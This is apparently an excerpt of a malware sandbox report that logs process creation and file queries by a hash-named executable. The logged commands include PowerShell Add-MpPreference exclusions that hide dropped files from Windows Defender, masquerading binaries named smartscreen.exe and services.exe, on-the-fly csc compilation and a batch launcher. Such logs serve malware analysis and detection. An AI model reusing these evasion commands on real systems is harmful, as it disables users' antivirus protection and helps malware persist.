                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeQueries volume information: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe VolumeInformation
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Queries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Queries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Queries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Queries volume information: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
